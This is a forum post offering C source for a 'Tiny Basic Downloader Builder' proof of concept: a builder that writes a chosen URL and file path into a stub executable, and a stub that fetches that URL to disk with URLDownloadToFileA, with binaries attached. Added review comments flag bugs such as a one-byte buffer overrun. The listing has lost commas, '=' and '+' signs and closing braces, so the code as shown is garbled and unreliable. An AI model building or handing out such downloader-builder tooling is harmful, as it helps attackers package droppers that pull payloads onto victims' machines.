Old 09-18-2021, 23:09
YANiS YANiS is offline
Tiny Basic Downloader Builder (Proof of Concept)

C Code:
/*
    MSVC
    Tiny Basic Downloader Builder (Proof of Concept)
    by YANiS

    This code snippet is provided 'as is' without warranty of any kind.
    No malicious uses are allowed.
*/

#include <windows.h>
#include "resource.h"

/*
 * Dialog procedure for the builder window.
 *
 * NOTE(review): this listing lost punctuation when the page was extracted
 * (argument commas, '=' in initialisers and '+' in pointer arithmetic are
 * missing, e.g. "hwndUINT uMsgWPARAM"), so it does not compile as shown.
 * The comments below describe the evident intent and hedge wherever a lost
 * token has to be assumed.
 *
 * On IDB_BUILD the handler reads two strings from the IDC_URL and IDC_PATH
 * controls, loads "stub.bin" into memory, overwrites bytes at fixed offsets
 * with those strings, and writes the result to "downloader.exe".
 *
 * Analyst note: the strings are copied into the image with strcpy() and no
 * encoding, so the configured URL and drop path sit in the output file as
 * plain ASCII and can be recovered with ordinary string extraction.
 */
BOOL CALLBACK DlgProc(HWND hwndUINT uMsgWPARAM wParam,LPARAM lParam) {

    /* 50-byte stack buffers; compare with the size handed to
       GetDlgItemTextA in the IDB_BUILD branch below. */
    
unsigned char url[50] = {0};
    
unsigned char path[50] = {0};

    switch (
uMsg) {
    case 
WM_CLOSE:
        /* presumably EndDialog(hwnd, 0) - the comma was lost */
        
EndDialog(hwnd0);
        break;

    case 
WM_INITDIALOG:
        
SetWindowTextA(hwnd"Basic Downloader Builder (Proof of Concept)");
        /* presumably EM_LIMITTEXT with wParam 50 and lParam 0 ("500" looks
           like the two arguments run together), i.e. each edit control is
           capped at 50 characters - TODO confirm against the attachment */
        
SendDlgItemMessageA(hwndIDC_URLEM_LIMITTEXT500);
        
SendDlgItemMessageA(hwndIDC_PATHEM_LIMITTEXT500);
        /* Focus is set by hand, and FALSE is returned for this message. */
        
SetFocus(GetDlgItem(hwndIDC_URL));
        return 
FALSE;

    case 
WM_COMMAND:
        switch(
LOWORD(wParam)) {

        case 
IDB_BUILD:

            /*
             * Rejects the build when either field yields fewer than 5
             * characters.
             * NOTE(review): the size argument reads as "50+1" while url and
             * path are 50 bytes. If that is the real value, a 50-character
             * entry plus its terminating NUL is 51 bytes and overruns each
             * stack buffer by one byte; sizeof(url) / sizeof(path) would
             * keep the copy in bounds.
             */
            if((
GetDlgItemTextA(hwndIDC_URL, (LPSTR)url50+1) < 5) || (GetDlgItemTextA(hwndIDC_PATH, (LPSTR)path50+1) < 5) ) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: URL or PATH error!");
                return 
1;
            }

            /* presumably "= NULL" and "= 0"; the '=' signs were lost */
            
unsigned char *lpBuffer NULL;
            
size_t fileSize 0;

            /* Open the template image read-only from the current directory. */
            
HANDLE hFile CreateFileA("stub.bin",
                                       
GENERIC_READ,
                                       
FILE_SHARE_READ,
                                       
NULL,
                                       
OPEN_EXISTING,
                                       
FILE_ATTRIBUTE_NORMAL,
                                       
NULL);

            if (
hFile == INVALID_HANDLE_VALUE) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: CreateFile error!");
                return 
1;
            }

            /*
             * presumably GetFileSize(hFile, 0), so the high-order size word
             * is not requested.
             * NOTE(review): GetFileSize reports failure as INVALID_FILE_SIZE,
             * not 0, so the test below only catches an empty file.
             */
            
fileSize GetFileSize(hFile0);
            if (
fileSize == 0) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: GetFileSize error!");

                
CloseHandle(hFile);
                return 
1;
            }

            /* Read/write buffer of fileSize bytes. No VirtualFree call
               appears anywhere in this handler, so it is never released. */
            
lpBuffer = (unsigned char *)VirtualAlloc(NULL,
                       
fileSize,
                       
MEM_COMMIT,
                       
PAGE_READWRITE);

            if (
lpBuffer == NULL) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: VirtualAlloc error!");
                
CloseHandle(hFile);
                return 
1;
            }

            /* A short read is treated as failure. NOTE(review): this error
               path returns without CloseHandle(hFile), unlike the two
               error paths above. */
            
DWORD bytesRead;
            if (!
ReadFile(hFile,
                          
lpBuffer,
                          
fileSize,
                          &
bytesRead,
                          
NULL) || bytesRead != fileSize) {

                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: ReadFile error!");
                return 
1;
            }
            
CloseHandle(hFile);
            
            /*
             * Patch the two strings into the loaded image.
             * NOTE(review): presumably "lpBuffer + 0x230" and so on; the '+'
             * was lost. The offsets are hard-coded per stub build (the
             * original comments tie them to the 64-bit and 32-bit stubs).
             * Nothing checks that fileSize exceeds offset + string length,
             * or that the bytes at the offset are the expected placeholder,
             * so a different stub.bin would be patched in the wrong place or
             * past the bytes that were read.
             */
#ifdef _WIN64
            
strcpy((char*)(lpBuffer 0x230), (char*)url);  // for stub 64-bit
            
strcpy((char*)(lpBuffer 0x268), (char*)path); // for stub 64-bit
#else            
            
strcpy((char*)(lpBuffer 0x218), (char*)url);  // for stub 32-bit
            
strcpy((char*)(lpBuffer 0x24C), (char*)path); // for stub 32-bit
#endif

            /* CREATE_ALWAYS: an existing downloader.exe is overwritten. */
            
hFile CreateFileA("downloader.exe",
                                
GENERIC_WRITE,
                                
0,
                                
NULL,
                                
CREATE_ALWAYS,
                                
FILE_ATTRIBUTE_NORMAL,
                                
NULL);

            /* NOTE(review): the status text names WriteFile although the
               call that failed here is CreateFileA. */
            if (
hFile == INVALID_HANDLE_VALUE) {
                
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: WriteFile error!");
                return 
1;
            }

            /* NOTE(review): neither the WriteFile return value nor
               bytesWritten is checked, so "FINISHED" is shown even if the
               write failed or was short. */
            
DWORD bytesWritten;
            
WriteFile(hFile,
                      
lpBuffer,
                      
fileSize,
                      &
bytesWritten,
                      
NULL);

            
CloseHandle(hFile);

            
SetWindowTextA(GetDlgItem(hwndIDC_STATUS), "Status: FINISHED");
            break;
        }
    /* The break above leaves only the inner switch; with no break after it,
       every WM_COMMAND that has not already returned falls into default and
       returns FALSE. Only WM_CLOSE reaches the final return TRUE. */
    default:
        return 
FALSE;
    }
    return 
TRUE;
}

/*
 * Builder entry point: shows the IDD_BUILDER dialog modally with DlgProc as
 * its procedure and returns 0 once the call comes back. The result of
 * DialogBoxParamA is not inspected, so a failure to create the dialog is
 * not reported.
 * NOTE(review): the closing brace of this function is missing from the
 * listing as extracted.
 */
int main() {
    
DialogBoxParamA(GetModuleHandleA(NULL),
                    
MAKEINTRESOURCE(IDD_BUILDER),
                    
NULL,
                    (
DLGPROC)DlgProc,
                    (
LPARAM)NULL);
    return 
0;

C Code:
/*
    MSVC
    Tiny Basic stub with markers
    by YANiS

    This code snippet is provided 'as is' without warranty of any kind.
    No malicious uses are allowed.
*/

#include <windows.h>
#include <urlmon.h>

#define URL_MARKER            "[url_marker......................................]"
#define FILE_PATH_MARKER    "[file_marker.....................................]"

/*
 * Stub entry point. Passes the two marker literals to URLDownloadToFileA as
 * source URL and destination file name, then shows a message box whose text
 * is the URL string and whose caption is the path string, and exits.
 *
 * URL_MARKER and FILE_PATH_MARKER are fixed-width placeholder literals; the
 * builder shown earlier on this page overwrites them in the compiled image
 * at hard-coded file offsets (presumably 50 characters each - TODO confirm).
 *
 * NOTE(review): the HRESULT from URLDownloadToFileA is discarded, so a
 * failed download is not detected. The closing brace of this function is
 * missing from the listing as extracted.
 *
 * Analyst note: URLDownloadToFileA is called directly, so the urlmon import
 * would normally be visible in the file's import table alongside the
 * plain-text URL and path strings.
 */
void main() {

    
URLDownloadToFileA(NULL,                // LPUNKNOWN pCaller,
                       
URL_MARKER,            // LPCSTR szURL,
                       
FILE_PATH_MARKER,    // LPCSTR szFileName,
                       
0,                    // DWORD dwReserved,
                       
NULL);                // LPBINDSTATUSCALLBACK lpfnCB

    /* Text = URL string, caption = path string (argument order below). */
    
MessageBoxA(NULL,
                
URL_MARKER,
                
FILE_PATH_MARKER,
                
MB_ICONINFORMATION);


    
ExitProcess(0);

Source and binaries (X86, X64, arm32 and arm64) attached.
Attached Files
File Type: rar tiny_builder_stub_POC.rar (10.7 KB, 10 views)